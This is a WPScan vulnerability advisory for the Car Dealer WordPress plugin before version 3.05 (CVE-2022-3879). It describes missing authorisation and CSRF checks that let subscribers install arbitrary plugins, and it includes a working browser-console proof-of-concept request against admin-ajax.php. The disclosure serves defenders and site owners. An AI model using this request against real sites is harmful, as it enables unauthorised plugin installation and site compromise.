WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Car Dealer < 3.05 - Subscriber+ Arbitrary Plugin Installation

Description

The plugin does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user to install and activate the classic-editor plugin

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=cardealer_install_plugin&slug=classic-editor',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

cardealer
Fixed in version 3.05

References

CVE
CVE-2022-3879

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-863

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified

Yes

WPVDB ID
0db1762e-1401-4006-88ed-d09a4bc6585b

Timeline

Publicly Published

2022-11-21 (about 6 months ago)

Added

2022-11-21 (about 6 months ago)

Last Updated

2022-11-21 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin